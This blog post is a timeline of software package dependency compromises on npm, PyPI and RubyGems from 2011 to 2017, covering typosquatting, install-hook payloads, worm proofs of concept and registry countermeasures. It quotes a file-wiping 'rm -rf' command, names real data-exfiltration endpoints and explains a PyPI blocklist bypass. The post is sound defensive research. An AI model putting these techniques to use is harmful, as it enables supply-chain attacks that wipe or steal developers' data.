Motivation

Since the summer of 2019 I have been looking into package dependency compromises, a subset of software supply chain attacks.

Today a number of popular programming languages make heavy use of more or less centralized package repositories and come with tools that make it easy to rely on third-party packages, which often come with lots of dependencies of their own. But with each dependency the attack surface for package dependency compromises increases - and malicious actors have already used different vectors to inject their payloads into software applications.

I had some ideas on how to monitor package repositories to identify malicious packages or malicious versions of packages. In order to test my ideas, at least in theory, against the attacks that were already uncovered in the past, I compiled a timeline of package dependency compromises. Not wanting to let this effort go to waste, I wrote this blog post summarizing and, to some extent, classifying each incident.

During this process I also came across some great prior research, blog posts, news articles, and some counter measures already deployed by the package repository teams. I have also included these events and resources in the timeline, in the hope that it will make the life easier for others interested in this field - a field which in my opinion will see significant action in the next few years.

In the end I found more and more incidents and research, so I decided to split the blog post into two parts, to “release early, release often”. This part covers everything from 2011, which is when the first notable event that I could find happened, to 2017, which is about halfway through my notes.

Please let me know if you find any relevant incidents or research that are missing.

Package Dependency Compromise Timeline 2011 - 2017

September 2011: Malicious Ruby Gems Proof of Concept

Benjamin Lee Smith publishes a number of Ruby gems that demonstrate how they can be abused for malicious purposes. He later gives a number of talks about his ideas and his experiences distributing these packages, that ping home, at conferences.

Here is a video recording of his “Hacking With Gems” talk at RuLu 2013.

A selection of the proof of concept packages:

awesome-rails-flash-messages pretends to improve the default Ruby on Rails flash messages, but also writes a file containing requests including a password parameter to a web public directory and sends this information to a web server.

  • Vector: Useful package
  • Method: Payload integrates directly with Rails, intercepts requests
  • Effect: Disclosure of requests data containing passwords

The post_install package demonstrates the use of the post install hook to execute code once on a developers machine or alike.

  • Vector: No vector (similar packages with different names advertised at Ruby conferences)
  • Method: Payload executed by post install hook
  • Effect: Sending whoamiinformation to server

March 2013: “Where is all the nodejs malware?”

John Lyle publishes an article about “nodejs malware” on the Systems Security Blog of the University of Oxford. He asks why nobody has written any malware yet, as “targets are juicy and the protection is minimal”. John doesn’t go into details on how the malicious code could be executed and in the example seems to describe a developer of a useful package turning rogue. It is also pointed out that the npm repository didn’t offer a “Report this package” option at the time.

I could not find any discovered cases of actual malicious packages on NPM in the sense of package dependency compromise that was released prior to his blog post.

June 7th 2013: Typosquatting-prevention package “requestes” uploaded to PyPI

David Fischer uploads the package “requestes” to the Python Package Index. Its name is one typo away from the popular Python library “requests”, so it blocks at least one potentially typosquatting name for malicious use.

In the package description and through a setup script David makes clear that this package could just as well contain malicious code executed with the rights of the current user.

Insert stern sounding security stuff here…

David Fischer

A weird thing is, that at the time of writing (7 years later) 4 public GitHub repositories actually do depend on this package, while in addition also including the actual “requests” library. The package was downloaded 1239 times in January of 2020.

June 17th 2013: “Reflections on nodejs malware”

John Lyle publishes a follow-up article “Reflections on nodejs malware” (link to archive.org version).

He now extends the scenario to other package repositories like rubygems and PyPI. Answering the question he brought up in his earlier blog post “Where is all the nodejs malware?” he says:

I can only assume that it is because such malware does not offer a high reward /effort ratio. There is too much low-hanging fruit elsewhere (phishing end users, for example) to make this particular avenue of attack worthwhile.

I think that is because the payload execution method he has in mind is that of a package that integrates with and targets specific application code. But frameworks like Ruby on Rails, that set the near-default for an entire programming languages ecosystem, make interception of interesting data on targeted systems easier, like we see with the PoC Ruby gems mentioned before. The other payload execution method of using setup hooks avoids integration with application code entirely - but still, setting up a phishing page is easier.

He also discusses the infection vector of publishing malicious versions of reputable packages on a large scale by attacking their developers using a Cross Site Request Forgery vulnerability that the NPM repository had just recently closed at the time.

A potential mitigation method that would need to be deployed by repositories and the actual programming languages he discusses is a permission-based system, similar to the one used in Android. Access of a packages code to the internet or specific system calls would need to be approved by the developer at the time of adding the dependency.

He ends “this somewhat rambling blog post by proposing that this is a very promising area of research.”

January 2015: “rimrafall” proof of concept wants to delete your files

João Jerónimo writes rimrafall, a proof of concept malicious npm package that tries to execute rm -rf /* /.* through a pre-install hook and thereby deleting all files the current user has access to. This package was uploaded to npm and removed within 2 hours, after it had been linked to on hackernews, clearly stating that it should not be installed.

  • Vector: -
  • Method: Payload executed by post-install hook
  • Effect: Deleting all accessible files

This package leads Adam Baldwin to publish the article “A Malicious Module on npm” on the liftsecurity.io blog (archive.org link, ^Lift Security was acquired by npm, Inc. in 2018).

He criticizes the author of “rimrafall” for his immediate public disclosure of the issue and the publishing of a malicious package on NPM, be it a proof of concept or not.

More importantly though, he also raises the issue of typosquatting of packages. With access to the HTTP logs of the npm registry Adam lists a number of “popular” typos made by developers trying to install certain packages. Examples are “coffeescript” and “coffe-script” instead of “coffee-script”, or “socketio” instead of “socket.io”. This will in fact become one commonly used vector of attack later.

February 2015 - “This one looks odd, doesn’t it?”

Reddit user chub79 posts a link to a PyPI (Python Package Index) package called “setuptool” to /r/python. This package is typosquatting the popular “setuptools” package, meaning it imitates being the well known package by being only one typing mistake away. The payload is executed as part of the setup.py file. It and sends the package name, the current time, the hostname, the public IP and whether or not the current user is root/has admin rights to a server under https://zzz.scrapeulous[.]com/.

Users are quick to report it to the PyPI security team and the package is removed. The actor used the handle “vacation” and chose “Kenneth Reitz” as their PyPI display name, imitating the well-known author of the popular “requests” library. This library also turned out to be the target of the other two packages uploaded by this user: “requsts” and “reqests”.

  • Vector: Typosquatting
  • Method: Payload in install hook
  • Effect: Upload of current user data

Shortly after its public reveal the C&C server displays the following text:

Usage of this project If you see this page then you came here because you installed some honey pot package over pip. All data that is sent to this server is for pentesting purposes. For more information cosider visiting my blog.

Therefore we are once again looking at a proof of concept/research project.

The author of this package turns out to be Nikolai Philipp Tschacher, who will hand in his Bachelor thesis on “Typosquatting in Programming Language Package Managers” more than one year later, in March 2016.

March 2015: Talk “Security And Modern Software Deployment”

Rory Mccune talks about “Security And Modern Software Deployment” (video/ slides) first at Securi-Tay conference and later at the AppSec EU15 conference.

He looks at developer account takeover, package repository compromise and even long-term operations by state-actors to create, publish, promote and maintain useful packages (or even package repositories) - but including non-obvious and plausibly deniable backdoors.

As (partial) counter measures Rory advises a focus on 2-Factor Authentication for developer accounts on package repositories, signing of packages by default and operational security improvements on the side of the package repositories, for example sending an e-mail to the maintainers of a package if a new version is released).

November 2015: The first npm worm proof of concept

pizza-party is a simple PoC npm worm written by Chris Contolini (blog post). It adds the spreading code to the install-script of all locally found packages and tries to publish new minor versions of them with the developers credentials. Afterwards it opens a YouTube video in a browser. This module was not published on npm.

  • Vector: After initial install: compromise of packages owned by infected developers
  • Method: Payload executed by install hook
  • Effect: Spreading itself, making people crave pizza

March 2016: “Typosquatting in Programming Language Package Managers” thesis

In March 2016 Nikolai Philipp Tschachers bachelor thesis is published at the University of Hamburg (blog post).

Nikolai describes the attack vector of typosquatting (until then mainly seen in the Domain Name System) and applies it to package repositories. He also investigates how different languages and/or package repositories are more or less affected and how some packages repositories already have basic counter-measures in place.

In the empirical part of the thesis he describes the experiment, of which we already have seen the beginnings of in February 2015. Python (PyPI), Node.js (npm) and Ruby (Rubygems.org) were targeted by uploading 214 packages amounting to total 19721 unique installations - most of them (over 15000) through PyPI. The names of the packages were either automatically generated typos of requests and async (with a Levenshtein-distance of one) or the names of standard libraries (which don’t need to be installed through a package manager) like urllib2 in Python 2. The Top 16 packages based on installation count were fake standard libraries.

On the defense side he looks at the choices and features made by the repositories to prevent certain types of attacks.

npm already doesn’t allow packages names after standard libraries to be uploaded. PyPI and Rubygems.org at the time allowed the registration of packages imitating standard libraries. After Nikolais previous experiment with the package “setuptool” (instead of “setuptools”) PyPI at least disallowed the re-registration of that particular package name.

March 2016 cont.: Vulnerability Note VU#319816 on npm

The CERT Division of the Software Engineering Institute of the Carnegie Mellon University publishes the vulnerability note VU#319816 based on research by Sam Saccone. It describes a worm in form of a npm package that spreads itself by pushing new (minor) versions of packages that the infected developer has push permissions for. These new versions all depend on another package that was created automatically using the developers nodejs credentials. This package contains the “spreading” code that is executed by a post-install hook.

  • Vector: Social Engineering for initial install, afterwards compromise of packages owned by infected developers
  • Method: Payload executed by post-install hook
  • Effect: Spreading itself

As initial mitigation for the issue, developers are advised to do the following:

  • As a user who owns modules you should not stay logged into npm. (Easily enough, npm logout and npm login)
  • Use npm shrinkwrap to lock down your dependencies
  • Use npm install someModule --ignore-scripts

In response to this npm published a blog post in which the problem is acknowledged, but also states that “npm cannot guarantee that packages available on the registry are safe”.

npm is working with security vendors to introduce enhanced security vulnerability scanning and mitigation services. This work is underway but not yet ready.

March 2016 cont. cont.: The left-pad incident

March of 2016 was a turbulent month for the nodejs/npm ecosystem in general: While not exactly a security incident, the infamous “left-pad incident” demonstrated how dependent the large parts of the node.js ecosystem are on single, rather small, open source packages. As many teams did not cache the packages that their software depended on, entire build systems could not fetch now removed packages and deployment queues came to a halt.

The reason for this powerful demonstration is the open source developer Azer Koçulus decision (his blogpost) to remove all his node.js packages from npm, after npm, Inc. (npms blogpost) changed the ownership of one of his packages called “kik” to now be owned by Kik Interactive Inc., original producers of the messaging app “kik messenger” (kiks blogpost).

The intricacies of this case regarding trademarks, open source software and commercial interests are not relevant in the case of dependency compromise, but the outfall - 273 partially very popular packages deleted from the npm repository - is. Among them is also the package “left-pad”, which many popular npm projects depended on, either directly or indirectly.

According to npm this particularly high-impact package was re-registered within 10 minutes by a good actor, and with the help of npm the full functionality is restored within 2.5 hours.

Nonetheless this incident shows two security-related insights:

  1. A well targeted attack against a “fundamental” package can have network effects throughout the ecosystem.
  2. Attackers could monitor the state of popular dependencies and automatically act as soon as any one is un-registered.

NPM, Inc. reacts to this incident by

  1. changing their policy regarding un-publishing packages, adding a number of conditions that have to be met in order to un-publish a package: either being added just very recently or having a low number of weekly downloads, no other packages dependent on it and a single owner.

  2. creating placeholder packages in place of unpublished packages, in case other packages depend on the removed package (this likely became unnecessary with the policy change that followed later).

October 2016 - May 2017: standard library squatting in PyPI

In October 2016 Steve Stagg notices with others at a Python meetup that they can register standard library names in the PyPI package repository.

After e-mailing the security contacts on listed for PyPI didn’t elicit a response, he proactively registers the system packages himself, and uploads package versions which simply raise RuntimeError("Package 'json' must not be downloaded from pypi") to inform the developer about their mistake.

  • Vector: Typosquatting of standard library names
  • Method: Payload executed by install hook
  • Effect: Informing the user about their mistake

In January 2017 he opens a GitHub issue on the pypi git repository to make others aware about this security issue, with a description of attack vectors, potential payloads and some statistics. These show that for example the “json” package was downloaded 10,710 times just in December of 2016.

One explanation offered by Steve is that:

There is also the possibility that people have written automatic requirements.txt creators that scrape imports to work out dependencies. In this situation, imports of built-in packages will end-up in requirements files too.

But only after he publishes the post “Building a botnet on PyPi” on hackernoon on May 19th people start to react. In the meantime the most “popular” package “json” had been downloaded nearly 60,000 times. Issues to disallow the upload of packages that imitate standard libraries are created and will eventually be acted on.

January 2017: Check your dev-requirements.txt

Michał Jaworski uploads packages containing this source code under the names

to PyPI.

These packages do not typosquat an existing package, but prey on users making a common mistake when trying to install the required packages for a python project. These required packages are are usually listed in a file called requirements.txt. The pip command line tool parses this file and installs all listed packages when called with

pip install -r requirements.txt

If a user by mistake leaves out the -r, pip instead attempts to install a package called requirements.txt. This package does not exist and this name and 3 common misspellings were blacklisted already since 2014 (this was later replaced by a database table of blacklisted names ). But the name of the file that lists all required dependencies can be freely chosen by the developer of the project, and other common names are the 4 names under which Michał registers this package.

Initially the package cheekily tries to imitate the actually intended action by installing the requirements from the requirements-file. Using a dynamic version number it manages to convince pip to install it again and again, even if it was already present, by pretending to be version 0.0.0 locally, so that there would always be a newer version on PyPI.

This functionality is later removed in favor of a message being printed, indicating that something probably unintended had just happened.

  • Vector: Typosquatting of erroneous install command
  • Method: Payload executed by install hook, version trick to re-install on every update check
  • Effect: Informing the user about their mistake

* mentioned.md in README and source code, but nowhere to be found. Might not have ever been uploaded according to Michał.

On June 1st 2017 security researcher fate0 publishes the blog post “Package 钓鱼”, translating to “Package fishing”. The blog post is in Chinese, therefore this section will describe its content in a bit more detail.

fate0 initially becomes aware of the issue of dependency typosquatting when he tries to fix a Python ImportError No module named smb.SMBConnection by executing pip install smb - as it turns out this package does not exist and the required package is called pysmb instead.

On the 23rd of May 2019 fate0 creates and registers the following four typosquatting packages

  • python-dev
  • mongodb
  • proxy
  • shadowsock

generated with a cookiecutter template that he later publishes in the GitHub repository cookiecutter-evilpy-package (after the repo called cookiecutter-evil-pypackage was terminated by GitHub, as we will soon find out).

The packages send the victims username, hostname, ip and hostinfo to a webtask.io HTTP endpoint, which then stores them publicly in issues on the GitHub repository fate0/cookiecutter-evil-pypackage.

24 hours later more than 700 issues are created through the secondary account (in Chinese internet speak “vest”) called “evilpackage” that fate0 registered for this purpose.

After this success fate0 decides to extend his footprint and creates more packages using the same template: The packages caffe, ffmpeg, git, mkl, opencl, opencv, openssl, pygpu, tkinter, vtk, and proxy are inspired by the auto-suggested searches when googling for “pip install”. The packages ftp, smb, hbase, samba, rabbitmq, zookeeper, phantomjs, and memcached are based on popular protocols and open source software.

By now some of the new packages with the description “just for fun :)” are being noticed (GitHub issue #644, mailing list).

In the meantime more than 2000 issues with private data are created in the public repository. An unknown actor starts to feed bogus data to the endpoint, and eventually the account that fate0 had created just for the issue-creation is marked as spam by GitHub and blocked (and quickly unblocked again after an e-mail). fate0 decides to send the user data to a server controlled by him instead, allowing him to implement basic IP rate limiting and thereby stop the wave of bogus data. But before that can take effect the collection repository is removed entirely, because of the breach of GitHubs terms of service. fate0 starts to save the data locally on the VPS and builds a website (archive.org screenshot) that he later links to in the message displayed during installation of the typo packages. The website is listing the user data that was uploaded.

On the 31st of May 2017, after some discussion in the aforementioned GitHub issue #644, fate0 deletes the packages (noting that others are now free to re-register them for themselves).

从 2017-05-27 10:38:03 到 2017-05-31 18:24:07,总计 106 个小时内, 有 9726 不重复的 ip 安装了 evil package,平均每个小时有 91 个 ip 安装了 evil package。

[From 2017-05-27 10:38:03 to 2017-05-31 18:24:07, in a total of 106 hours, 9726 unique IPs installed an evil package, an average of 91 IPs installing an evil package every hour.]

fate0

The Top 6 packages based on downloads according to fate0 are:

  • opencv(2862 downloads)
  • tkinter (2834 downloads)
  • mkl (810 downloads)
  • python-dev (789 downloads)
  • git (713 downloads)
  • openssl (683 downloads)

 

  • Vector: Typosquatting
  • Method: Payload in install hook
  • Effect: Upload and public disclosure of current user data, later also informing the users about their mistake

During testing fate0 also notices the same issue that Michał had demonstrated in January of the same year, namely that users might mistakenly try to install a package called requirements.txt, instead of installing the requirements listed in a file of the same name. But fate0 also expands on the issue, making it more pressing.

As previously explained, uploading a package called “requirements.txt” is not possible, because this name is on the hard-coded blacklist at the time. But fate0 looks at how PyPI searches for package names and finds out that any sequence of dots, hyphens and underscores are reduced to one hyphen on both sides of the package name comparisons:

lower(regexp_replace($1, '(\.|_|-)+', '-', 'ig'))

This is done through a function written in SQL called normalize_pep426_name. Therefore a search for requirements.txt would result in a comparison of requirements-txt to all package names normalized in the same fashion, making ReQuIrEmEnTs---tXt a possible result.

Critically, this normalization is not done when comparing the name of a new package against the blacklist. This allows fate0 to upload the package requirements-txt to PyPI.

But running pip install requirements.txt still returns an error: “Could not find a version that satisfies the requirement requirements.txt”. The reason for this error is that the requested package name is compared to the package names of the versions available listed by PyPI. But fate0 discovers that this check can be avoided if a Python “wheel” (packed binary package format instead of the “source” format) is offered. In that case only the normalized wheel name is compared to the requested package name, returning a positive match.

The big advantage of using wheel packages instead of the source packages is that the wheels are already “built” for your system architecture, therefore there is no need to execute code in a “setup.py” on installation. fate0 circumvents this hurdle by making his “requirements–txt” package wheel depend on another “source” package that he controls, called ztz. This package contains the payload that “reminds users who installed requirements-txt”.

  • Vector: Typosquatting of erroneous install command, bypassing blacklist by use of the normalization of package searches
  • Method: Payload executed by install hook of a dependency of the wheelified package
  • Effect: Upload and public disclosure of current user data, later also informing the user about their mistake

August 2017: Malicious typosquatting on npm, or “The crossenv Incident”

On August 1st Twitter user @o_cee tweets at the author of the cross-env package, Kent C. Dodds, that his package is being typosquatted by the package “crossenv”:

@kentcdodds Hi Kent, it looks like this npm package is stealing env variables on install, using your cross-env package as bait

@o_cee

The malicious package sends a HTTP POST request to the server npm.hacktask.net that contains the environment variables as part of its package-setup.js script. Kent quickly informs npm, and the package repository removes this package together with 37 other packages published by the same user “hacktask” on the 19th of July:

  • babelcli (42 downloads)
  • cross-env.js (43 downloads)
  • crossenv (679 downloads)
  • d3.js (72 downloads)
  • fabric-js (46 downloads)
  • ffmepg (44 downloads)
  • gruntcli (67 downloads)
  • http-proxy.js (41 downloads)
  • jquery.js (136 downloads)
  • mariadb (92 downloads)
  • mongose (196 downloads)
  • mssql-node (46 downloads)
  • mssql.js (48 downloads)
  • mysqljs (77 downloads)
  • node-fabric (87 downloads)
  • node-opencv (94 downloads)
  • node-opensl (40 downloads)
  • node-openssl (29 downloads)
  • node-sqlite (61 downloads)
  • node-tkinter (39 downloads)
  • nodecaffe (40 downloads)
  • nodefabric (44 downloads)
  • nodeffmpeg (39 downloads)
  • nodemailer-js (40 downloads)
  • nodemailer.js (39 downloads)
  • nodemssql (44 downloads)
  • noderequest (40 downloads)
  • nodesass (66 downloads)
  • nodesqlite (45 downloads)
  • opencv.js (40 downloads)
  • openssl.js (43 downloads)
  • proxy.js (43 downloads)
  • shadowsock (40 downloads)
  • smb (40 downloads)
  • sqlite.js (48 downloads)
  • sqliter (45 downloads)
  • sqlserver (50 downloads)
  • tkinter (45 downloads)

In their blog post on this incident the npm team clarifies that the “baseline” of 39-43 downloads that every package meets is likely caused by automatic downloads and mirroring of the package repository. The number of downloads also rises with the number of versions that the mirrors have to download, and therefore the npm team estimates that “at most 50 real installations of crossenv” occured, with jquery.js coming second in the number of real installations.

In reaction npm, mostly symbolically, adds the e-mail address of “hacktask” to the blacklist, and suggests that they might add automatic checks for typosquatting of popular packages.

  • Vector: Typosquatting
  • Method: Payload in install hook
  • Effect: Leak of potentially sensitive environment variables from development and production systems

So far this was the usual reporting on facts. Now I want to present my theory regarding this case:

I think this npm typosquatting attack was inspired by the previously described blog post and research on typosquatting on PyPI by fate0, because of the following reasons:

  • Timing: 1.5 months after fate0s publishes his blog post the malicious packages are released on npm
  • Language: There are indicators that the author(s) of the npm typosquatting attack speak Mandarin (allowing them to easily read the blogpost) and/or have knowledge about the Chinese software development community:
    • They typosquatted “shadowsocks”, an open source encryption protocol mostly used in mainland China
    • A github organization called “hacktask” (similar to the dropzone domain npm.hacktask.net and npm user) forked the GitHub repository aliyun-node/commands, containing shell helpers to administer nodejs in the Alibaba Cloud, some time after the July 13th 2017.
    • hacktask.net had been using a Chinese nameserver until February 23rd 2017, when they moved behind Cloudflare, similar to hacktask.org. Both hosted Mandarin-language content.
    • xss.hacktask.net used to host a Chinese SaaS C&C for XSS probes, as pointed out by diimdeep.
  • Targets: The npm attack involved 38 packages, while fate0 used 22 package names. 8 of fate0s package names had 14 counterparts in the npm attack (35%):
    • proxy: proxy.js and http-proxy.js
    • shadowsock: shadowsock
    • smb: smb and samba
    • ffmpeg: ffmepg and nodeffmpeg
    • caffe: nodecaffe
    • openssl: node-opensl and node-openssl
    • opencv: opencv.js
    • tkinter: tkinter and node-tkinter

Especially tkinter is a weird package to typosquat on npm, as it is a TK-GUI interface library for Python and has no popular counterpart in the nodejs ecosystem with a similar name.

This incident shows that in order to secure users of package repositories we cannot simply focus on our favorite package manager of choice, but have to look across language borders to detect potential threats before they hit.

September 9th 2017: SK CSIRT advisory on PyPI typosquatting

On September 29th 2017 the Slovakian Computer Security Incident Response Team publishes the advisory skcsirt-sa-20170909-pypi-malicious-code, in which they warn about 10 typosquatting packages that were uploaded to PyPI between the 2nd - 4th of June of the same year. They do an exceptionally good job in sharing the Indicators of Compromise (IOCs) and offering scripts for developers to figure out if they have been affected.

The following packages were identified:

  • acqusition (impersonating acquisition)
  • apidev-coop (impersonating apidev-coop_cms)
  • bzip (impersonating bz2file)
  • crypt (impersonating crypto)
  • django-server (impersonating django-server-guardian-api)
  • pwd (impersonating pwdhash)
  • setup-tools (impersonating setuptools)
  • telnet (impersonating telnetsrvlib)
  • urlib3 (impersonating urllib3)
  • urllib (impersonating urllib3)

The packages contain the code of the typosquatted target packages, but in addition send the name of the package, the username of the current user and the hostname of the machine (XOR “encrypted”) to http://121.42.217.44:8080 at install time.

SKCSIRT notifies the Python Security Response Team (PSRT) and “all identified packages were taken down immediately”.

  • Vector: Typosquatting
  • Method: Payload executed by install hook
  • Effect: Sending of IP, package name, hostname and user to server

The author(s) of the packages added the comment “just toy, no harm :)” to the payload.

Dan Goodin wrote a good article about this incident and this type of issue for arstechnica, and there is a discussion on the python-dev mailinglist.

September 17th 2017: Pytosquatting is a thing now

After reading Nikolai Tschachers thesis on typosquatting from March 2016 and Steve Staggs similar story, Benjamin Bach notices, that many of the packages that were named after standard library names (or typosquats of them) were simply deleted, making them available for registration again. After trying to alert the PyPI team and Python security team about this issue, according to him without a response, Benjamin starts the “pytosquatting” project together with IT-security journalist Hanno Böck.

They register available standard library names and std-lib typosquats on PyPI and upload their own “blocker”-packages. These would make a HTTP request to a server as part of the setup routine, to count the number of installs. Afterwards they would interrupt the installation process and inform the user of what just happened.

  • Vector: standard library squatting and standard library typosquatting
  • Method: Payload in install hook
  • Effect: Sending at least IP and package name to a server

Alleine das Paket urllib2 wird jeden Tag von über Tausend Personen installiert.

[The package urllib2 alone was installed by over a thousand people per day]

Hanno Böck in his article about this on Golem.de [in German]

They later presented the talk “Package Mis-Management” at BornHack 2018 about this project.

September 18th 2017: PyPI PRs to the rescue

On the 18th September 2017 Pull Request #2409 is merged into PyPI warehouse, the “backoffice” of PyPI. It adds a routine that fuzzy matches new packages against a list of python standard library names and restricts their registration if there is a match. Issue #2151, opened in reaction to Steves post on Hackernoon, is closed.

September 22nd 2017: The PyPI Response Report

On September 22nd Python core developer Victor Stinner publishes an in-depth incident report on the Python security annoucements mailing list adressing the advisory by the SKCSIRT and the issue of typosquatting on PyPI in general. This mailing list was created as a result of the advisory.

Victors report adds one package xml (impersonating a standard library) to the list of packages being part of this attack. Additionally it covers the recent history of typosquatting on PyPI, starting with Nikolais thesis in March 2016, over the fate0 incident to the pytosquatting-project.

It also links to the new “PyPI typo squatting” section on the python-security website.

The report then discusses a number of mitigation techniques and their advantages and disadvantages, like 3rd party component review, client side typo detection and notification, the blocking of registration for certain package names, and server notifications for similar project names (to be looked at by PyPI admins), which is the solution that was chosen.

EOY 2017

I’m now about halfway through the list of package dependency compromise events that I compiled and decided to release this first part of the timeline. If you see an event missing, please let me know, and thanks for reading this far.